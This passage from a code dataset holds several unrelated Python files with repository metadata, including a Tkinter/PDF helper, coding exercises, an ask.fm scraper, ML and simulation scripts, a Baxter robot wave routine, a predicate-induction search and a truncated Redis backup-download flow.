contenido_data=doc(\"./documentos/data2.txt\").operacion(\"LE\")\n for encabezado_dato in contenido_data:\n if encabezado_dato[0] == encabezado:\n encabezado_dato[1] = nuevo_valor\n break\n doc(\"./documentos/data2.txt\").operacion(\"E\",contenido_data)\n\ndef finalizar_op():\n #ENVIA LOS DATOS CONTENIDOS EN EL ARCHIVO DATA A LA BASE DE DATOS\n #conec.enviar_datos_tabla()\n # BORRA LOS DATOS DE DATA PARA QUE MUESTRE SOLO ENCABEZADOS\n doc().operacion(\"E\",\n [['ID_SALIDA','ID_VEHICULO','RUTA','CHOFER','HORA_SALIDA','DIA_SALIDA','MARCA_1','VEL_1','MARCA_2','VEL_2','MARCA_3','VEL_3','MARCA_LLEGADA']])\n # COLOCAR EL CONTADOR DE LOS MAPAS EN CERO\n 
cambiar_doc2(\"numero_mapas\",\"0\")\n # COLOCAR EL CONTADOR DE NUMERO DE SALIDAS EN CERO\n cambiar_doc2(\"numero_salidas\",\"0\")\n\ndef buscar_doc2(dato_buscado=None):\n datos_encabezados=doc(\"./documentos/data2.txt\").operacion(\"LE\")\n for encabezado_dato in datos_encabezados:\n if encabezado_dato[0] == dato_buscado:\n return encabezado_dato[1]\n\ndef agregar_nueva_salida(data_ingresada):\n n_salida=buscar_doc2(\"numero_salidas\")\n nuevas_salidas=data_ingresada\n for data in nuevas_salidas:\n n_salida=int(n_salida)+1\n data.insert(0,str(n_salida))\n \n cambiar_doc2(\"numero_salidas\",str(n_salida))\n doc().operacion(\"soloE\",nuevas_salidas)\n\ndef modificar_salida(id_salida):\n datos_salida=doc().operacion(\"LE\")\n for salida in datos_salida:\n if salida[0] == id_salida:\n salida.append(time.strftime('%H:%M:%S'))\n doc().operacion(\"E\",datos_salida)\n break\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n\n#ABRIR DIRECCIONES WEB\n\n# lista de enlaces\nrepositorio_git_proyecto = \"https://github.com/Programapython/gui_progra_2\"\ninstaladores = \"https://drive.google.com/drive/folders/14vLAJIizDJtl1uRlQGc7pIsXCnJ9yMzS?usp=sharing\"\n\nclass abre():\n def __init__(self, opcion, ventana):\n \n if opcion == \"repo\":\n wb.open(repositorio_git_proyecto)\n elif opcion == \"insta\":\n wb.open(instaladores)\n\n #CIERRA LA VENTANA DE TKINTER QUE NOS REDIRECCIONA AL ENLACE\n if ventana != None:\n ventana.destroy()\n\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\nclass crear_doc():\n def __init__(self, fecha_solicitada, *vehiculos_buscados):\n pdf=fpdf.FPDF()\n pdf.add_page()\n pdf.set_font(\"Arial\",size=12)\n fecha=time.strftime('%Y-%m-%d')\n pdf.cell(190,10,txt=\"INFORME\",border=True, ln=1, align=\"C\")\n pdf.cell(200,10, txt=f\"Fecha de solicitud: {fecha}\",ln=1, align=\"left\")\n pdf.cell(200,10, txt=f\"Fecha solicitada: {fecha_solicitada}\", ln=1, align=\"left\")\n pdf.cell(200,10, txt=f\"Unidad (es) buscadas: {vehiculos_buscados}\", ln=6, align=\"left\")\n pdf.output(dest='F',name=f\"./documentos/informes/{fecha}_{vehiculos_buscados}.pdf\")\n shutil.copy(f\"./documentos/informes/{fecha}_{vehiculos_buscados}.pdf\", buscar_doc2(\"direccion_informe\"))\n\n\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"","repo_name":"Programapython/gui_progra_2","sub_path":"funciones/funcionesGenerales.py","file_name":"funcionesGenerales.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70951077833","text":"import time\n\n\nclass CommandHelp:\n def __init__(self, help_lines: list[str], reset_time: int = 1.5):\n #A list containing all the help lines.\n self.help_lines = help_lines\n 
#After how long the \n self.reset_time = reset_time\n\n self.current_reset_time = 0\n self.current_line = 0\n\n\n #Gets the help line corresponding to the current index, then increments it by one.\n def get_help_line(self) -> str:\n line_count = len(self.help_lines)\n old_line = self.current_line\n self.current_reset_time = time.time()\n\n #We check if we are on the end of the help lines, if so we wrap around.\n if self.current_line == line_count - 1:\n self.current_line = 0\n #Otherwise we just increment the counter.\n else:\n self.current_line += 1\n\n #Return the appropriate help line with a counter.\n return f\"Command help {old_line + 1}/{line_count}: {self.help_lines[old_line]}\"\n\n\n def help_line_handler(self) -> None:\n #If the time after the last press exceeds the reset time we reset the line counter.\n if time.time() >= self.current_reset_time + self.reset_time:\n self.current_line = 0\n","repo_name":"Tinch334/Console-editor-rewrite","sub_path":"actions/command_help.py","file_name":"command_help.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"72935646471","text":"def lcs(s: str, t: str) -> int:\n n, m = len(s), len(t)\n dp = [0 for _ in range(m + 1)]\n for i in range(n):\n mem = dp[:]\n for j in range(m):\n if s[i] == t[j]:\n dp[j + 1] = mem[j] + 1\n elif dp[j + 1] < dp[j]:\n dp[j + 1] = dp[j]\n return dp[m]\n\nn = int(input())\nfor _ in range(n):\n s = input()\n t = input()\n print(lcs(s, t))\n","repo_name":"7riatsu/aoj","sub_path":"courses/alds/1_10/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11252020360","text":"import math\r\n\r\n\r\nclass nijeTrokutError(Exception):\r\n pass\r\n\r\n\r\nclass Trokut():\r\n def __init__(self, a, b, c):\r\n self.__stranice = []\r\n\r\n if (a >= 0 and b >= 0 and c >= 0) and (a + b > c and a + c > b and b + c > a):\r\n self.__a = a\r\n self.__b = b\r\n self.__c = c\r\n self.__stranice.append(a)\r\n self.__stranice.append(b)\r\n self.__stranice.append(c)\r\n else:\r\n raise Exception(\"Nije trokut\")\r\n\r\n def __str__(self):\r\n return f\"Trokut {self.__a}, {self.__b}, {self.__c}\"\r\n\r\n def __repr__(self):\r\n return f\"Trokut({self.__a}, {self.__b}, {self.__c})\"\r\n\r\n def opseg(self):\r\n return self.__a + self.__b + self.__c\r\n\r\n def povrsina(self):\r\n s = self.opseg() / 2\r\n return math.sqrt((s - self.__a) * (s - self.__b) * (s - self.__c))\r\n\r\n\r\nclass JednakokracniTrokut(Trokut):\r\n def __init__(self, baza, krak):\r\n a = baza\r\n b = krak\r\n c = krak\r\n Trokut.__init__(self, a, b, c)\r\n\r\n\r\nclass JednakostranicniTrokut(Trokut):\r\n def __init__(self, baza):\r\n a = baza\r\n b = baza\r\n c = baza\r\n Trokut.__init__(self, a, b, c)\r\n\r\n\r\nprint('*** test 1 ***')\r\nlista_stranica = [(1, 2, 3), (3, 4, 5), (3, 4, 4), (3, 3, 3)]\r\nfor stranice in lista_stranica:\r\n try:\r\n t = Trokut(*stranice)\r\n print(repr(t))\r\n except Exception as e:\r\n print(e, stranice)\r\n\r\nprint('*** test 2 ***')\r\nlista_stranica = [(3, 4, 5), (3, 4, 4), (3, 3, 3)]\r\nfor stranice in lista_stranica:\r\n t = Trokut(*stranice)\r\n print('%r ima opseg %.3f i povrsinu %.3f' % (t, t.opseg(), t.povrsina()))\r\n\r\nprint('*** test 3 ***')\r\ntrokuti = [Trokut(3, 4, 5), JednakokracniTrokut(3, 4),\r\n JednakostranicniTrokut(5)]\r\nfor t in trokuti:\r\n 
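The comment above `self.reset_time` is truncated in the source; from `help_line_handler` its intent is clearly "after how long (in seconds) since the last key press the line counter resets to the first help line". Note also that the `reset_time: int = 1.5` annotation says `int` while the default is a float. A minimal usage sketch:

help_cmd = CommandHelp(['save: ctrl+s', 'quit: ctrl+q'], reset_time=2.0)

help_cmd.help_line_handler()        # resets the counter if the user paused long enough
print(help_cmd.get_help_line())     # -> 'Command help 1/2: save: ctrl+s'
print(help_cmd.get_help_line())     # -> 'Command help 2/2: quit: ctrl+q'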
print(t)\r\n","repo_name":"josip2312/Programsko-Inzenjerstvo","sub_path":"vjezbe4/trokut..py","file_name":"trokut..py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18803485291","text":"from requests_html import *\nfrom tkinter import *\n\nex=Tk()\nex.title(\"أرشيف\")\nex.geometry(\"600x700+250+250\")\ns = HTMLSession()\nr=s.get(\"https://ask.fm/KareemAHelmy2\")\nn=int(r.html.find('.profileTabAnswerCount ',first=True).text)\nfilename = input(\"filename: \")\nwith open(filename+\".txt\", \"w\", encoding=\"utf-8\") as f:\n for m in range(n):\n x=r.html.find(\".streamItem_header\")[m]\n y=r.html.find(\".streamItem_content\")[m]\n f.write(f\"السؤال: {x.text} \\n \\n الجواب: {y.text} \\n {'*'*50} \\n\")\n\n","repo_name":"mahmoud1817/mine","sub_path":"python/projects/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73406988551","text":"from typing import List, Optional, Text, Tuple\n\nimport ml_collections\nfrom core.lib import metrics\n\nConfig = ml_collections.ConfigDict\nEvaluationMetric = metrics.EvaluationMetric\n\n\ndef default_config():\n \"\"\"The default config.\"\"\"\n config = Config()\n\n # Trainer configs\n config.multidevice: bool = True\n config.restore_checkpoint_dir: Optional[Text] = ''\n config.finetune: Text = 'ALL' # If set, indicates which set of parameters to load from the restore_checkpoint.\n config.binary_targets: bool = False # If True, 1 = error, 0 = no error.\n config.study_id: Optional[Text] = '' # A study is a way of organizing experiments.\n config.experiment_id: Optional[Text] = '' # An experiment is launched by a single command, may have multiple runs.\n config.run_id: Optional[Text] = '' # A run is a single trainer run with a single set of hparams. 
run_id should identify hparams.\n config.notes: Optional[Text] = '' # Any notes to record about the run.\n config.use_in_dataset_field = True\n\n # Training configs\n config.train_steps = 0 # 0 means run forever.\n config.seed = 0\n config.optimizer = 'adam' # sgd, adam\n config.learning_rate = 0.03\n config.grad_clip_value: float = 0.0 # 0 means no clipping.\n\n # Model HParams\n config.model_class: Text = 'IPAGNN' # IPAGNN, Transformer, LSTM\n config.raise_in_ipagnn: bool = False\n config.rnn_layers = 2\n config.hidden_size: int = 16\n config.span_encoding_method = 'first' # first, mean, max, sum\n config.permissive_node_embeddings = True\n config.raise_decision_offset = 0.0\n\n # TODO(dbieber): Switch to \"use_conditioning\" or similar.\n config.use_film: bool = False\n config.use_cross_attention: bool = False\n config.docstring_transformer_num_layers: int = 2\n config.cross_attention_num_heads = 1\n config.modulate_mode = 'add'\n\n # Compressive IPA-GNN configs\n config.use_compressive_ipagnn = False\n config.compressive_max_skip = 10\n config.compressive_mask_maker = 'default'\n\n # GGNN Configs\n config.ggnn_use_exit_node_embedding = False\n config.ggnn_use_fixed_num_layers = True\n config.ggnn_layers = 3\n\n # Dataset filtering and configs\n config.epochs: Optional[int] = 0\n config.batch_size: int = 128\n config.allowlist: Optional[List[int]] = None\n config.max_tokens: int = 512\n config.max_num_nodes: int = 128\n config.max_num_edges: int = 128\n config.max_steps: int = 174\n\n # Transformer configs\n config.transformer_emb_dim: int = 512\n config.transformer_num_heads: int = 8\n config.transformer_num_layers: int = 6\n config.transformer_qkv_dim: int = 512\n config.transformer_mlp_dim: int = 2048\n config.transformer_dropout_rate: float = 0.1\n config.transformer_attention_dropout_rate: float = 0.1\n config.mil_pool = 'max'\n\n # RNN baseline configs\n config.rnn_input_embedder_type = \"node\" # token, node\n\n # Runner configs\n config.eval_freq = 10000\n config.save_freq = 5000\n config.eval_primary_metric_scale: int = 1 # 1 or -1\n config.eval_primary_metric_name: str = EvaluationMetric.ACCURACY.value\n config.eval_metric_names: Tuple[str] = metrics.all_metric_names()\n config.eval_subsample = 1.0\n config.eval_max_batches = 30\n config.unsupervised_localization: bool = True # Must be set to True to compute localization logits.\n\n # Logging\n config.printoptions_threshold = 256\n\n config.early_stopping_on = False\n config.early_stopping_delta = 0.001\n config.early_stopping_threshold = 4\n return config\n\n\ndef get_config():\n \"\"\"Gets the config.\"\"\"\n config = default_config()\n config.lock()\n return config\n\n\ndef get_test_config():\n config = default_config()\n config.multidevice = False\n config.eval_max_batches = 2\n config.hidden_size = 10\n config.span_encoding_method = 'first'\n config.max_tokens = 64\n\n config.transformer_emb_dim = 32\n config.transformer_num_heads = 4\n config.transformer_num_layers = 2\n config.transformer_qkv_dim = 32\n config.transformer_mlp_dim = 64\n config.transformer_dropout_rate = 0.1\n config.transformer_attention_dropout_rate = 0.1\n return config\n","repo_name":"google-research/runtime-error-prediction","sub_path":"config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"72853498631","text":"import numpy as np\n\nfrom firedrake import File, SpatialCoordinate\n\nfrom src import utils\nfrom 
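Because `get_config()` in the record above returns a locked `ConfigDict`, downstream scripts can update existing hyperparameters but any misspelled or new key fails loudly, which is the point of locking in ml_collections. A short usage sketch:

config = get_config()
config.hidden_size = 64        # allowed: locking freezes the key set, not the values

try:
    config.hiden_size = 64     # typo: adding an unknown key to a locked config
except AttributeError as err:
    print(err)                 # ml_collections reports the unknown field

with config.unlocked():        # explicit escape hatch for genuinely new fields
    config.extra_flag = True   # `extra_flag` is a hypothetical example key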
src.curves import CURVES, Reparameterisation\nfrom src.manufactured_solutions import (\n MANUFACTURED_SOLUTIONS_PATH, MANUFACTURED_SOLUTIONS_MOMENTUM, MESH_RESOLUTIONS, MANUFACTURED_SOLUTIONS_PARAMS,\n ManufacturedSolution,\n)\nfrom src.mesh_generation import MeshGenerationParameters, generate_mesh\nfrom src.shooting import ShootingParameters, GeodesicShooter\n\n\nif __name__ == \"__main__\":\n logger = utils.Logger(MANUFACTURED_SOLUTIONS_PATH / \"manufactured_solutions.log\", )\n\n shooting_parameters = ShootingParameters()\n shooting_parameters.time_steps = 15\n shooting_parameters.alpha = 0.5\n time_steps_reparam = 15\n\n for template in CURVES:\n for resolution in MESH_RESOLUTIONS:\n logger.info(f\"Generating mesh for curve: '{template.name}' with resolution: h={resolution}.\")\n\n mesh_params = MeshGenerationParameters(mesh_size=resolution)\n mesh_path = generate_mesh(mesh_params, template, MANUFACTURED_SOLUTIONS_PATH)\n\n for momentum in MANUFACTURED_SOLUTIONS_MOMENTUM:\n # shooting\n logger.info(f\"Shooting with `{momentum.name}`.\")\n shooter = GeodesicShooter(logger, mesh_path, template, shooting_parameters)\n\n template_and_momentum_name = f\"{mesh_path.stem}_{momentum.name}\"\n path = mesh_path.parent / template_and_momentum_name\n path.mkdir(exist_ok=True)\n # logging\n logger.info(f\"Logging to `{path}`.\")\n for parameterisation in MANUFACTURED_SOLUTIONS_PARAMS:\n n_cells = len(parameterisation)\n values = np.random.normal(loc=0, scale=.1, size=n_cells)\n reparam = Reparameterisation(n_cells, values=values)\n reparameterised_points = reparam.exponentiate(parameterisation, time_steps_reparam)\n template_points = template.at(reparameterised_points)\n\n curve_result = shooter.shoot(momentum)\n target = np.array(curve_result.diffeo.at(template_points))\n momentum_function = shooter.momentum_function()\n momentum_expr = momentum.signal(*SpatialCoordinate(shooter.mesh))\n momentum_function.interpolate(momentum_expr)\n noise = np.random.normal(loc=0, scale=.1, size=target.shape)\n target += noise\n\n # dump the solution\n mf = ManufacturedSolution(\n template=template,\n target=target,\n noise=noise,\n mesh_path=mesh_path,\n momentum=momentum,\n reparam_values=values,\n reparam=reparam,\n parameterisation=parameterisation,\n )\n mf.dump(path)\n logger.info(f\"Wrote solution to {path / mf.name()}.\")\n\n # move mesh via linear projection and dump pvd files\n shooter.update_mesh()\n File(path / f\"{mesh_path.stem}_{momentum.name}.pvd\").write(shooter.shape_function)\n","repo_name":"andreasbock/planar-curve-matching","sub_path":"src/examples/run_manufactured_solutions.py","file_name":"run_manufactured_solutions.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"4974192512","text":"from import_export import resources\nfrom tablib import Dataset\nfrom callback.models import CallBack\nfrom category.models import Category\nfrom feedback.models import Feedback\nfrom order.models import Order\nfrom product.models import Product, ProductManager, Add, AddManager, Labels\nfrom section.models import SharesSection, DocumentSection, HowToSection, \\\n ContactSection, EmailSection, SocialSection, OrderSection, FooterSectionText, \\\n Votes\nfrom subscribers.models import Subscriber\nfrom tag.models import Tag\n\nMODELS_LIST = [\n CallBack,\n Category,\n Feedback,\n Order,\n Product,\n ProductManager,\n Add,\n AddManager,\n Labels,\n SharesSection,\n DocumentSection,\n HowToSection,\n 
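The manufactured-solutions script above draws both the reparameterisation values and the target noise from unseeded `np.random.normal` calls, so regenerating the solutions produces different targets on every run. If reproducible datasets are wanted, a seeded generator is the usual fix (a sketch, not from the original):

rng = np.random.default_rng(seed=0)
values = rng.normal(loc=0, scale=0.1, size=n_cells)
noise = rng.normal(loc=0, scale=0.1, size=target.shape)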
ContactSection,\n EmailSection,\n SocialSection,\n OrderSection,\n FooterSectionText,\n Votes,\n Subscriber,\n Tag,\n ]\n\ndef resources_objects_factory(_model):\n class DynamicResource(resources.ModelResource):\n model_name = _model.__name__\n class Meta:\n model = _model\n #class Meta:\n # model = model\n #DynamicResource.Meta = Meta\n print(\"Model Resource - %s - created\" % _model)\n return DynamicResource()\n\ndef main():\n for model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = resource.export()\n with open('csv_files/%s.csv' % str(resource.model_name), 'w') as file:\n file.write(dataset.csv)\n\n\ndef import_data():\n for model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = Dataset()\n with open('csv_files/%s.csv' % str(resource.model_name), 'r') as file:\n imported_data = dataset.load(file.read())\n\n result = resource.import_data(imported_data, dry_run= True)\n\n if not result.has_errors():\n resource.import_data(dataset, dry_run= False)\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\nfrom migration_to_mysql import resources_objects_factory, MODELS_LIST\ntest_resource = resources_objects_factory(MODELS_LIST[0])\ndataset = test_resource.export()\nwith open('%s.csv' % str(test_resource.model_name), 'w') as file:\n file.write(dataset.csv)\n\n\n# import data\nfrom migration_to_mysql import resources_objects_factory, MODELS_LIST\nfor model in MODELS_LIST:\n resource = resources_objects_factory(model)\n dataset = Dataset()\n with open('csv_files/%s.csv' % str(resource.model_name), 'r') as file:\n imported_data = dataset.load(file.read())\n\n result = resource.import_data(imported_data, dry_run= True)\n print(result.has_errors())\n\n# if not result.has_errors():\n# resource.import_data(dataset, dry_run= False)\n\n\"\"\"\n","repo_name":"OscarGibson/yakudza-backend","sub_path":"migration_to_mysql.py","file_name":"migration_to_mysql.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"15668107469","text":"\"\"\"def isPrime(num):\n if num == 0 or num == 1:\n return False\n else:\n for i in range(2, int(num / 2) + 1):\n if num % i == 0:\n return False\n return True\n\ndef perfectNum(num):\n sum = 0\n for i in range(1, int(num / 2) + 1):\n if num % i == 0:\n sum += i\n if num == sum:\n return True\n else:\n return False\n\nfor i in range(1, 1000):\n if perfectNum(i):\n print(i)\n\n\"\"\"\ndef ebob(num1, num2):\n minimum = min(num1, num2)\n maximum = max(num1, num2)\n ebob = 1\n for i in range(1, minimum + 1):\n if minimum % i == 0 and maximum % i == 0 and i > ebob:\n ebob = i\n\n print(ebob)\n\n\n\ndef ekok(num1, num2):\n minimum = min(num1, num2)\n maximum = max(num1, num2)\n for i in range(1, minimum + 1):\n if (i * maximum) % minimum == 0:\n return i * maximum\n\n\nprint(ekok(6, 7))\n\n\n\ndef okunus(num):\n if num / 10 >= 1:\n\n dict1 = {1 : \"bir\", 2 : \"iki\", 3 : \"üç\", 4 : \"dört\", 5 : \"beş\", 6 : \"altı\", 7 : \"yedi\", 8 : \"sekiz\", 9 : \"dokuz\", 0 : \"\"}\n dict2 = {1 : \"on\", 2 : \"yirmi\", 3 : \"otuz\", 4 : \"kırk\", 5 : \"elli\", 6 : \"altmış\", 7 : \"yetmiş\", 8 : \"seksen\", 9 : \"doksan\"}\n print(dict2[num // 10], dict1[num % 10])\n else:\n print(\"Lütfen 2 basamaklı bir sayı girin!\")\n\ndef pisagor():\n for i in range(1, 101):\n for j in range(1, 101):\n c = (i**2 + j**2) ** 0.5\n if (c == int(c)):\n print(\"a:\", i ,\"b:\", j, \"c:\", 
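The commented-out lines inside `resources_objects_factory` in the record above show an earlier attempt to attach `Meta` after class creation, which django-import-export's declarative metaclass ignores because `Meta` is read at class-creation time; the working closure-based version is equivalent to building the class dynamically with `type()`, which Python delegates to the proper metaclass. A sketch of that alternative:

def resources_objects_factory(_model):
    Meta = type('Meta', (), {'model': _model})
    DynamicResource = type(
        f'{_model.__name__}Resource',
        (resources.ModelResource,),
        {'model_name': _model.__name__, 'Meta': Meta},
    )
    return DynamicResource()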
int(c))\n\n\n\n","repo_name":"MuhammedUlviOzkaya/old-codes-python-java","sub_path":"PycharmProjects/Summer2020/Advanced/IsPrime.py","file_name":"IsPrime.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8064281779","text":"#!/usr/bin/env python3\n# rospy - ROS Python API\nimport rospy\nimport baxter_interface\n\n\ndef hello_baxter():\n # initialize our ROS node, registering it with the Master\n\n # get the right limb's current joint angles\n left_arm = baxter_interface.limb.Limb(\"left\")\n right_arm = baxter_interface.limb.Limb(\"right\")\n # left_joint_angels = left_arm.joint_angles()\n # right_joint_angels = right_arm.joint_angles()\n\n baxter_interface.RobotEnable().enable()\n\n rospy.loginfo(\"Moving to neutral pose...\")\n left_arm.move_to_neutral()\n right_arm.move_to_neutral()\n\n # store the first wave position\n right_wave_1 = {\n \"right_s0\": -0.459,\n \"right_s1\": -0.202,\n \"right_e0\": 1.807,\n \"right_e1\": 1.714,\n \"right_w0\": -0.906,\n \"right_w1\": -1.545,\n \"right_w2\": -0.276,\n }\n left_wave_1 = {\n \"left_s0\": -0.459,\n \"left_s1\": -0.202,\n \"left_e0\": 1.807,\n \"left_e1\": 1.714,\n \"left_w0\": -0.906,\n \"left_w1\": -1.545,\n \"left_w2\": -0.276,\n }\n\n # store the second wave position\n right_wave_2 = {\n \"right_s0\": -0.395,\n \"right_s1\": -0.202,\n \"right_e0\": 1.831,\n \"right_e1\": 1.981,\n \"right_w0\": -1.979,\n \"right_w1\": -1.100,\n \"right_w2\": -0.448,\n }\n left_wave_2 = {\n \"left_s0\": -0.395,\n \"left_s1\": -0.202,\n \"left_e0\": 1.831,\n \"left_e1\": 1.981,\n \"left_w0\": -1.979,\n \"left_w1\": -1.100,\n \"left_w2\": -0.448,\n }\n\n # wave three times\n rospy.loginfo(\"Hello\")\n for _move in range(2):\n left_arm.move_to_joint_positions(left_wave_1)\n right_arm.move_to_joint_positions(right_wave_1)\n left_arm.move_to_joint_positions(left_wave_2)\n right_arm.move_to_joint_positions(right_wave_2)\n","repo_name":"nakata5321/Baxter_simulation_controller","sub_path":"src/Hello_baxter.py","file_name":"Hello_baxter.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12604851033","text":"class PredicateInduction(object):\n \n def __init__(self, target, attribute_predicates, score_func):\n self.target = target\n self.attribute_predicates = attribute_predicates\n self.score_func = score_func\n self.predicate_score = {}\n self.predicate_res = {}\n \n def score(self, predicate, **kwargs):\n if predicate.__repr__() not in self.predicate_score:\n score, res = self.score_func(self.target, predicate.mask, None, True, **kwargs)\n self.predicate_score[predicate.__repr__()] = score\n self.predicate_res[predicate.__repr__()] = res\n return self.predicate_score[predicate.__repr__()]\n\n def merge_predicate_attribute_adjacent(self, predicate, adjacent, attribute):\n children = [p for p,p_ in adjacent if self.score(p)>self.score(p_) and self.score(p)>self.score(predicate)]\n return children\n \n def expand_predicate_attribute(self, predicate, attribute):\n adjacent = predicate.get_adjacent_attribute_outer(attribute)\n children = self.merge_predicate_attribute_adjacent(predicate, adjacent, attribute)\n if len(children)>0:\n return self.expand_predicate_attribute(max(children, key=lambda x: self.score(x)), attribute)\n else:\n return predicate\n \n def fit_predicate_attribute(self, predicate, attribute):\n adjacent = 
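In the Turkish record that ends above, `ebob` computes the greatest common divisor by trial division, `ekok` the least common multiple by scanning multiples of the larger operand, `okunus` spells out two-digit numbers in Turkish words (the prompt "Lütfen 2 basamaklı bir sayı girin!" means "please enter a 2-digit number"), and `pisagor` brute-forces Pythagorean triples. The two number-theory helpers reduce to the identity lcm(a, b) = a*b / gcd(a, b):

import math

def ebob(a, b):     # GCD
    return math.gcd(a, b)

def ekok(a, b):     # LCM
    return a * b // math.gcd(a, b)

assert ekok(6, 7) == 42     # matches the print(ekok(6, 7)) call above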
predicate.get_adjacent_attribute_inner(attribute) + predicate.get_adjacent_attribute_outer(attribute)\n children = self.merge_predicate_attribute_adjacent(predicate, adjacent, attribute)\n if len(children)>0:\n return self.fit_predicate_attribute(max(children, key=lambda x: self.score(x)), attribute)\n else:\n return predicate\n \n def fit_other_attributes(self, predicate, attribute):\n for other_attribute in predicate.attribute_values.keys():\n if predicate.dtypes[other_attribute] != 'nominal':\n predicate = self.fit_predicate_attribute(predicate, other_attribute)\n return predicate\n \n def expand_predicate(self, predicate):\n new_predicates = []\n for k,v in self.attribute_predicates.items():\n if k not in predicate.attribute_values.keys():\n for p in v:\n new_predicate = predicate.add_attribute(p, k)\n if not new_predicate.is_contained_any(new_predicates):\n if predicate.dtypes[k] != 'nominal':\n new_predicate = self.expand_predicate_attribute(new_predicate, k)\n new_predicate = self.fit_other_attributes(new_predicate, k)\n if self.score(new_predicate) > self.score(predicate):\n new_predicates.append(new_predicate)\n return new_predicates\n \n def insert_sorted(self, lst, predicate, breadth_first=False):\n if len(lst) == 0:\n lst.append(predicate)\n return 1\n score = self.score(predicate)\n for i in range(len(lst)):\n i_score = self.score(lst[i])\n if (score > i_score and not breadth_first) or (score > i_score and len(predicate.attribute_values)<=len(lst[i].attribute_values)):\n lst.insert(i, predicate)\n return i\n lst.append(predicate)\n return len(lst)\n \n def insert_sorted_all(self, lst, predicates, breadth_first=False):\n for predicate in predicates:\n self.insert_sorted(lst, predicate, breadth_first)\n \n def search(self, predicates=None, breadth_first=False, num_clauses=None):\n if predicates is None:\n predicates = [a for b in self.attribute_predicates.values() for a in b]\n self.accepted = {i+1: [] for i in range(len(self.attribute_predicates))}\n frontier = sorted(predicates, key=lambda x: self.score(x), reverse=True)\n while len(frontier)>0:\n print(len(frontier))\n# print({k: len(v) for k,v in accepted.items()})\n predicate = frontier.pop(0)\n# print(predicate, self.score(predicate))\n print(predicate, self.score(predicate))\n if not predicate.is_contained_any([a for b in [v for k,v in self.accepted.items() if k>=len(predicate.attribute_values)] for a in b]+frontier):\n if num_clauses is None or len(predicate.attribute_values)0:\n self.insert_sorted_all(frontier, new_predicates, breadth_first)\n else:\n if self.score(predicate)>0:\n self.insert_sorted(self.accepted[len(predicate.attribute_values)], predicate)\n else:\n if self.score(predicate)>0:\n self.insert_sorted(self.accepted[len(predicate.attribute_values)], predicate)\n return self.accepted\n","repo_name":"jrogerthat/pixal-react","sub_path":"backend/predicate_induction/predicate_induction.py","file_name":"predicate_induction.py","file_ext":"py","file_size_in_byte":5077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8076956961","text":"import copy\nimport logging.config\nfrom dataclasses import asdict\nfrom typing import Dict\n\nfrom django.utils.translation import ugettext as _\n\nfrom backend.db_meta.enums.cluster_type import ClusterType\nfrom backend.flow.engine.bamboo.scene.common.builder import SubBuilder\nfrom backend.flow.engine.bamboo.scene.redis.common.exceptions import TendisGetBinlogFailedException\nfrom 
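`insert_sorted` in the predicate-induction record above is a linear-time insertion into a list kept in descending score order, with scores memoised in `self.predicate_score` keyed by `repr(predicate)`, which silently assumes each predicate's repr is stable and unique. For the plain best-first case (ignoring the breadth-first tie-break), the stdlib gives the same ordering with a binary search (a sketch; the `key=` parameter of `bisect.insort` needs Python 3.10+):

import bisect

def insert_sorted(self, lst, predicate):
    # Descending by score == ascending by negated score.
    bisect.insort(lst, predicate, key=lambda p: -self.score(p))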
backend.flow.plugins.components.collections.redis.redis_download_backup_files import (\n RedisDownloadBackupfileComponent,\n)\nfrom backend.flow.utils.redis.redis_context_dataclass import (\n ActKwargs,\n CommonContext,\n DownloadBackupFileKwargs,\n RedisDataStructureContext,\n)\n\nlogger = logging.getLogger(\"flow\")\n\n\ndef redis_backupfile_download(\n root_id: str, ticket_data: dict, cluster_info: dict, sub_kwargs: ActKwargs, param: Dict\n) -> SubBuilder:\n \"\"\"\n redis 指定时间拉取远程备份文件用于后续的数据构造\n @param root_id: flow 流程root_id\n @param ticket_data: 关联单据 ticket对象\n @param cluster_info: 关联的cluster对象\n \"\"\"\n\n sub_pipeline = SubBuilder(root_id=root_id, data=copy.deepcopy(ticket_data))\n # 全备份文件下载\n task_ids = [file_info[\"task_id\"] for file_info in param[\"full_file_list\"]]\n download_kwargs = DownloadBackupFileKwargs(\n bk_cloud_id=cluster_info[\"bk_cloud_id\"],\n task_ids=task_ids,\n dest_ip=param[\"new_temp_ip\"],\n dest_dir=param[\"dest_dir\"],\n reason=\"redis data structure full backup file download\",\n )\n sub_pipeline.add_act(\n act_name=_(\"下载{}全备文件到{}\").format(param[\"source_ip\"], param[\"new_temp_ip\"]),\n act_component_code=RedisDownloadBackupfileComponent.code,\n 